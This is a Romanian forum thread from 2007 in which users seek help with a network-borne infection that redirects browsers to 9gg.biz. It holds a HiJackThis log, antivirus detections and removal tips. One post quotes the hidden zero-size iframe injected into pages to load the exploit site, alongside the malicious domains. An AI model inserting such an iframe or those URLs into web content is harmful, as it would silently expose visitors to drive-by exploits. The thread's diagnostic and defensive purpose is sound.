Virus de retea !

Cam de o saptamana am luat un virus de retea .... de fiecare data cand intru pe iexplorer ma redirectioneaza pe un anumit site "9gg.biz" am ca antivirus KasperSky care il tot blocheaza dar degeaba..

cand incerc sa deschid un site oarecare imi apare redirect la h_ttp://9gg.biz/... iar kaspersky il blocheaza
detected: malware Exploit.Win32.Agent.bb URL: h_ttp://9gg.biz/index.html
detected: malware Exploit.HTML.IESlice.av URL: h_ttp://9gg.biz/xl.htm

.... am formatat cred ca de vreo 5 ori pana acuma .... dak instalez windowsu fara cablul de retea bagat nare nimic ... dar cum am bagat cablul cum o ia de la capat ... deci chair nu mai merge nimic pe calculator ... dont senduri dupa dont senduri ...

....am gasit pe un forum ca kkt'ul asta de virus face proxy arp (isi multiplica mac'ul si se genereaza la fiecare copie un alt ip intrand astfel in conflict, facandu-se si flood )

Ma puteti ajuta sa-l scot plz  

Edited by GaMeR, 08 December 2007 - 19:35.

Un log HiJackThis ar ajuta.

Logfile of Trend Micro HiJackThis v2.0.2
Scan saved at 7:47:39 PM, on 12/8/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\NFY Internet\Internet Starter.exe
C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 7.0\avp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 7.0\avp.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\Winamp\winamp.exe
C:\WINDOWS\explorer.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
C:\PROGRA~1\MOZILL~1\FIREFOX.EXE
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\WinRAR\WinRAR.exe
C:\Program Files\WinRAR\WinRAR.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - Default URLSearchHook is missing
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [Internet Starter] C:\Program Files\NFY Internet\Internet Starter.exe
O4 - HKLM\..\Run: [AVP] "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 7.0\avp.exe"
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: Winamp Agent.lnk = C:\Program Files\Winamp\winampa.exe
O8 - Extra context menu item: Add to Anti-Banner - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 7.0\ie_banner_deny.htm
O9 - Extra button: Web Anti-Virus statistics - {1F460357-8A94-4D71-9CA3-AA4ACF32ED8E} - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 7.0\SCIEPlgn.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\PROGRA~1\YAHOO!\MESSEN~1\YPAGER.EXE (file missing)
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\PROGRA~1\YAHOO!\MESSEN~1\YPAGER.EXE (file missing)
O14 - IERESET.INF: START_PAGE_URL=http://www.google.com
O20 - AppInit_DLLs: C:\PROGRA~1\KASPER~1\KASPER~1.0\adialhk.dll
O23 - Service: Kaspersky Internet Security 7.0 (AVP) - Kaspersky Lab - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 7.0\avp.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe

--
End of file - 3872 bytes

vad ca ruleaza si Spybot S&D pe acolo...ai dat scan cu el ?

cu ad-aware 2007 ai incercat un scan?



urmatoarea data cand instalezi windoze....

1) fara cablu conectat
2) antivirus/firewall/antispyware din surse de incredere(ex: Softpedia)
3) abia dupa ce instalezi astea, le dai pe high la setari si apoi te ocupi de conectarea cablului de net/retea
4) update la windoze
5) folosesti ca browser firefox/opera

ca sa nu-ti mai spun ca acesti virusi sunt din 2005...cred ca te-ai infectat cu ei inainte sa instalezi antivirusul !

Edited by crysty2k5, 08 December 2007 - 20:06.

oke merci ... deja ma pun la instalat ... dak nu mere nici de data asta crek ii dau fok  

ca antivirus bag kaspersky internet security ala care are si firewall ... dar ca antispyware .. ce_mi recomanzi ?

GaMeR, on Dec 8 2007, 20:14, said:

Kaspersky Internet Security are si antispyware

Chiar cand am bagat cablul de retea mi-a aparut asta

asta inseamna ca iar s-a virusat ????  

Al cui e ip-ul ala? Doar ai fost atacat, insa firewallul de la kaspersky a blocat. E doar un avertisment.

GaMeR, on Dec 8 2007, 22:06, said:

eu ti-as recomanda sa faci update la Windows.
Apar multe actualizari de securitate care fixeaza gaurile exploatabile de astfel de virusi.

crysty2k5, on Dec 8 2007, 20:00, said:

Sigur, am vazut eu cat de "atent" verificate sunt programele de pe softpedia, inclusiv cele cu "garantia softpedia"

Si mie mi-a aparut acelasi virus, se pare ca a fost unu in retea si a dat la toti(chiar daca baietii de la retea au spus ca s-a rezolvat). Acum dau un scan cu Spyware Doctor, sa vad daca rezov ceva.

Edited by ionut_xx, 10 December 2007 - 10:38.

Daca infectia iti apare si cu windowsul pe curat (+ antivirus, antyspyware, firewall...) poate este din cauza kitului de windows, sa nu fie chiar cd-ul sau virusat.

Am postat asta si pe computergames:

ATENTIE MARE
Cred ca n-a mai fost un virus asa nenorocit de la Sasser. Din ce-am citit pina acum se pare ca are caracteristici stealth plus rootkit (mascheaza registrii si dll-urile infectate) astfel incit systemul pare curat. Se pare ca se ia prin retea. Nod32 nu-mi gaseste nimic, nici in safe mode n-am rezolvat mare lucru.
Inca convietuiesc cu el, ma chinui de vreo 3 ore sa-l scot, sper sa nu-mi dea vreun format pe neve daca-l zgindar. Se pare ca altereaza si cautarile, afecteaza Internet Explorer. Acum sint pe Opera.

TAGURI:
9gg.biz VIRUS CONIME.EXE Virus:W32/Alman.B, 9gg biz
9gg.biz Alman.B CONIME.EXE ARP
9gg.biz CONIME.EXE

SIMPTOME:
Internetul merge greu, daca dati "view source" pe o pagina apare ceva de genul:
<iframe src=http://9gg.biz/ width=0 height=0 frameborder=0></iframe>.

Solutie temporara:
- Blocati conectarea la 9gg.biz, editati fisierul C:\WINDOWS\system32\drivers\etc\host si adaugati linia:
127.0.0.1 9gg.biz
- Mai puteti adauga si site-ul http://9gg.biz la "Restricted sites" in Internet Explorer Options. Dar asta NU rezolva problema definitiv, trebuie sa apara antivirusul.

Eu stau cu el de vreo doua zile, mi-e groaza sa reinstalez windows-ul. Google-ul nu gaseste aproape nimic, decit site-uri chinezesti, deci vreo metoda de curatare oficiala nu exista inca.

Edited by Armonica, 10 December 2007 - 12:38.

Eu cred ca am reusit sa-l sterg cu Spyware Doctor, am scos cablul de la net, am dat un search, l-a gasit si l-am sters.
Acum am un ping constant, pana acum ori aveam loss, ori in loc sa stea constant pe la 30ms, sarea pe la 200-300.

Dupa asta am mai dat si un search cu Kaspersky si n-a gasit nimic. Oricum kaspersky si-a facut treaba si l-a blocat de cand mi-a aparut.

I-am semnalat problema nesimtitului de la retea, care imi zisese ca totul s-a rezolvat in retea, iata ce mi-a zis:

Quote

Merita o palma peste cap.

Spyware Doctor nu-l scoate, am incercat si eu. Cred ca ti-a gasit altceva. Noi deocamdata convietuim pasnic, el isi vede de treaba lui, eu de-a mea....
Mie cred ca mi-a mutat si Temporary Internet Files in alt director, ca nu mai pot sa umblu acolo...   se ia prin retea jigodia....

Edited by Armonica, 10 December 2007 - 18:42.

Spyware Doctor mi-a gasit ceva cu risc "high", cred ca asta era, chiar daca n-am stat sa ma uit mai atent la descriere.
Dupa asta am scos cablul de net si am scanat si cu Kaspersky, n-a gasit nimic. Daca ar mai fi fost in calculator ar fi trebuit sa-l gaseasca, pentru ca antivirusul m-a anuntat prima data de el.
Dupa asta am scanat si cu Ad-Aware, iar nimic.

Am bagat cablul si dupa o ora iar alerta, sa-mi cada fata. I-am dat block always din antivirus, mi-a mai aparut de 2-3 ori ca antivirusul il blocheaza si dupa asta nimic.

E clar ca rahatul asta circula prin retea si n-am ce face. Si boul de la retea are tupeul sa-mi zica ca e de la mine, cand el cu gura lui mi-a zis ca a fost unul aseara cu virusul asta, dar l-au deconectat. Pai ba idiotule, e vina mea?

Cred ca singura solutie e sa-mi mai iau 1Gb de memorie si sa tin deschis tot timpul Kaspersky, SpywareDoctor, un firewall si Ad-Aware.

Poi ce, tu-ti inchizi firewall-ul si antivirusul? Si te mai miri ca iei virusi...

Nu am zis ca tin antivirusul inchis. Am zis ca-mi mai cumpar memorie ca sa pot sa tin mai multe deschise.

mda .... se pare ca si-a schimbat locatia .... acuma imi inregistraza alt site virusat si anume htt.p://8v8.biz
cat deal dreaq poa sa fie virusul asta ....
am vorbit cu providerul de la net ca e virusata reteaua si el mi-a zis ca cik baga-ti antivirus ....